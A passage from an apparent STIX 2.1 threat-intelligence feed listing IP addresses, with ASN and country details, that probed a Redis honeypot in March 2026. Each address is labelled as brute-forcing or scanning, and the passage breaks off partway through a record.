      "created": "2026-03-20T21:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--ac34cbd1-db60-4a54-a7b8-3a7620675808",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T21:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T21:25:04.000Z",
      "valid_until": "2026-04-21T21:25:03.000Z"
    },
    {
      "created": "2026-03-20T21:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--ba5cd1f9-157b-41af-82c5-100869b76d1e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T21:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.67']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T21:25:04.000Z",
      "valid_until": "2026-04-21T21:25:03.000Z"
    },
    {
      "created": "2026-03-20T23:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0",
      "id": "indicator--35e4c2e0-682c-4949-ad1d-c0887b4e165c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T23:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '34.123.78.31']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T23:25:05.000Z",
      "valid_until": "2026-04-21T23:25:04.000Z"
    },
    {
      "created": "2026-03-20T23:25:05.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--0cfac61a-7b2c-448c-8445-8c760a7b97c1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-20T23:25:05.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.199.23']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-20T23:25:05.000Z",
      "valid_until": "2026-04-21T23:25:04.000Z"
    },
    {
      "created": "2026-03-21T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=50219; asn_org=Valence Technology Co.; redis_cmd_hits=0",
      "id": "indicator--303ae204-7771-4a1a-bec0-1d30f1d4f8e7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '194.164.107.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T02:25:07.000Z",
      "valid_until": "2026-04-22T02:25:06.000Z"
    },
    {
      "created": "2026-03-21T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--6a8518b0-8f4b-4f47-8395-0c33e93d11b5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.121.46.26']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T02:25:07.000Z",
      "valid_until": "2026-04-22T02:25:06.000Z"
    },
    {
      "created": "2026-03-21T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--08ac6586-90bc-4e51-820c-419d33b87c8a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.55.171.27']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T02:25:07.000Z",
      "valid_until": "2026-04-22T02:25:06.000Z"
    },
    {
      "created": "2026-03-21T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--bc4dca83-8cb9-4e3b-9712-67eb51a7c02f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.117.110.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T02:25:07.000Z",
      "valid_until": "2026-04-22T02:25:06.000Z"
    },
    {
      "created": "2026-03-21T05:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0",
      "id": "indicator--721b8030-dc0a-4d9e-91fd-c078c98fc38b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T05:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.116.210.131']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T05:25:07.000Z",
      "valid_until": "2026-04-22T05:25:05.000Z"
    },
    {
      "created": "2026-03-21T06:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=AE; asn=214209; asn_org=Internet Magnate (Pty) Ltd; redis_cmd_hits=0",
      "id": "indicator--29937e5b-0378-4241-88c4-537229f6491c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T06:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '151.242.30.226']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T06:25:15.000Z",
      "valid_until": "2026-04-22T06:25:12.000Z"
    },
    {
      "created": "2026-03-21T06:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=538; ports=6379; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); cats=Generic Protocol Command Decode; redis_cmd_hits=0; cmd=\"...........J.....35..._M.......U.......M.b. ...#.Q.c.6...dP..n.t.....8[).......+./.,.0......... ...........A............................. ... c.......... ......\"",
      "id": "indicator--d961ad73-3e44-430c-9477-97f83ee8a4f5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T06:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '176.65.132.181']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T06:25:15.000Z",
      "valid_until": "2026-04-22T06:25:12.000Z"
    },
    {
      "created": "2026-03-21T07:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0",
      "id": "indicator--73ec225d-d2e1-4d4e-8cda-ac93d949ab90",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T07:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '117.50.47.100']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T07:25:07.000Z",
      "valid_until": "2026-04-22T07:25:06.000Z"
    },
    {
      "created": "2026-03-21T07:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--ff6e4df6-08d3-48f3-9854-edb941afd985",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T07:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.12.175']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T07:25:07.000Z",
      "valid_until": "2026-04-22T07:25:06.000Z"
    },
    {
      "created": "2026-03-21T08:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=VN; asn=63760; asn_org=AZDIGI Corporation; redis_cmd_hits=0",
      "id": "indicator--5c0be79d-f040-4458-a636-b7bdd0dec4bb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T08:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.221.220.169']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T08:25:06.000Z",
      "valid_until": "2026-04-22T08:25:05.000Z"
    },
    {
      "created": "2026-03-21T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--48861b80-2455-458f-81ff-c2946c953bfd",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.82.47.2']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T14:25:13.000Z",
      "valid_until": "2026-04-22T14:25:12.000Z"
    },
    {
      "created": "2026-03-21T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--38c521aa-73a8-4ccf-a622-a55f1067c9ac",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.82.47.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T14:25:13.000Z",
      "valid_until": "2026-04-22T14:25:12.000Z"
    },
    {
      "created": "2026-03-21T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--c156612c-818c-453f-9b9b-0d8f226db9c5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.207.68.254']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T15:25:13.000Z",
      "valid_until": "2026-04-22T15:25:12.000Z"
    },
    {
      "created": "2026-03-21T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--83f4460b-c834-4ce0-8a71-7dbd79c31c0f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.110.246.150']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T17:25:13.000Z",
      "valid_until": "2026-04-22T17:25:12.000Z"
    },
    {
      "created": "2026-03-21T18:25:20.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--4beb16f0-c1ca-4918-b93e-6c9c1b080153",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T18:25:20.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '206.168.34.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T18:25:20.000Z",
      "valid_until": "2026-04-22T18:25:19.000Z"
    },
    {
      "created": "2026-03-21T18:25:20.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; redis_cmd_hits=0",
      "id": "indicator--d72f5b2a-3791-4ee8-b09d-9ab49f2b8a63",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T18:25:20.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.224.29']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T18:25:20.000Z",
      "valid_until": "2026-04-22T18:25:19.000Z"
    },
    {
      "created": "2026-03-21T19:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--4403499d-ce52-4286-bd20-e5b1cd508db0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T19:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.204']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T19:25:15.000Z",
      "valid_until": "2026-04-22T19:25:14.000Z"
    },
    {
      "created": "2026-03-21T19:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=AU; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--efd4dc26-8537-49f2-ab88-69c5bde91308",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T19:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '4.147.233.166']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T19:25:15.000Z",
      "valid_until": "2026-04-22T19:25:14.000Z"
    },
    {
      "created": "2026-03-21T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--f5232267-a66d-46cf-a4fc-d89651d08433",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.12.128']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T20:25:13.000Z",
      "valid_until": "2026-04-22T20:25:12.000Z"
    },
    {
      "created": "2026-03-21T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--6acbb7af-fe8c-4449-adc9-378c0675173a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.223.173.197']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T20:25:13.000Z",
      "valid_until": "2026-04-22T20:25:12.000Z"
    },
    {
      "created": "2026-03-21T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d982dc3f-2425-4e27-99dd-47d2c50777de",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '68.183.120.205']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T20:25:13.000Z",
      "valid_until": "2026-04-22T20:25:12.000Z"
    },
    {
      "created": "2026-03-21T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--23005956-4a66-49bc-8a45-a1880a1ed755",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-21T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.75.44.66']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T21:25:13.000Z",
      "valid_until": "2026-04-22T21:25:12.000Z"
    },
    {
      "created": "2026-03-21T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--434bc7d3-3a23-4c20-abcc-0f017ebf5e57",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-21T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '61.240.139.28']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-21T23:25:13.000Z",
      "valid_until": "2026-04-22T23:25:12.000Z"
    },
    {
      "created": "2026-03-22T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--d1cc8a2b-5c96-4fa7-ba89-70dd05be3e47",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.175.205.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T04:25:13.000Z",
      "valid_until": "2026-04-23T04:25:12.000Z"
    },
    {
      "created": "2026-03-22T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=98; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"SSH-2.0-Go  \"",
      "id": "indicator--92ca091d-2fdb-49eb-abfa-3cab754ffb27",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.132.26.232']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T05:25:13.000Z",
      "valid_until": "2026-04-23T05:25:12.000Z"
    },
    {
      "created": "2026-03-22T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=VN; asn=18403; asn_org=FPT Telecom Company; redis_cmd_hits=0",
      "id": "indicator--2900f73f-6632-44e8-bddb-04edf8573222",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-22T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '210.245.79.89']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T06:25:13.000Z",
      "valid_until": "2026-04-23T06:25:12.000Z"
    },
    {
      "created": "2026-03-22T07:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--5c508141-e30f-4838-ab94-f6726cf67076",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T07:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.169.106.171']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T07:25:07.000Z",
      "valid_until": "2026-04-23T07:25:05.000Z"
    },
    {
      "created": "2026-03-22T09:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0",
      "id": "indicator--1e8920fe-9198-427a-8f3d-d188e0ac0764",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-22T09:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '144.24.3.130']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T09:25:07.000Z",
      "valid_until": "2026-04-23T09:25:06.000Z"
    },
    {
      "created": "2026-03-22T09:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=PL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--a2bb9475-dca8-440e-afc5-65e746bbf032",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-22T09:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.215.89.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T09:25:07.000Z",
      "valid_until": "2026-04-23T09:25:06.000Z"
    },
    {
      "created": "2026-03-22T11:25:24.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--ec0ee394-b2d7-4d33-a4dc-6f6eda17536f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T11:25:24.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.163.14.238']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T11:25:24.000Z",
      "valid_until": "2026-04-23T11:25:12.000Z"
    },
    {
      "created": "2026-03-22T12:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--f379ce65-b675-4d52-86b4-9cab6fb3c3ce",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T12:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '61.53.96.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T12:25:07.000Z",
      "valid_until": "2026-04-23T12:25:05.000Z"
    },
    {
      "created": "2026-03-22T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=GB; asn=60592; asn_org=Gransy s.r.o.; redis_cmd_hits=0",
      "id": "indicator--a088894c-ffb8-4206-9a86-3909064e4b7f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-22T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '46.175.135.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T13:25:13.000Z",
      "valid_until": "2026-04-23T13:25:12.000Z"
    },
    {
      "created": "2026-03-22T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--c0158a08-2f90-44bc-8280-bff261b999f3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-22T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.82.47.20']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T14:25:13.000Z",
      "valid_until": "2026-04-23T14:25:12.000Z"
    },
    {
      "created": "2026-03-22T16:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--57b46c15-ae84-4190-a092-43d276595eed",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-22T16:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '119.45.38.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T16:25:14.000Z",
      "valid_until": "2026-04-23T16:25:12.000Z"
    },
    {
      "created": "2026-03-22T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--dfb7b648-32bd-4dfa-80cf-ca98480f5822",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-22T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.28.191.174']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-22T17:25:13.000Z",
      "valid_until": "2026-04-23T17:25:12.000Z"
    },
    {
      "created": "2026-03-22T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
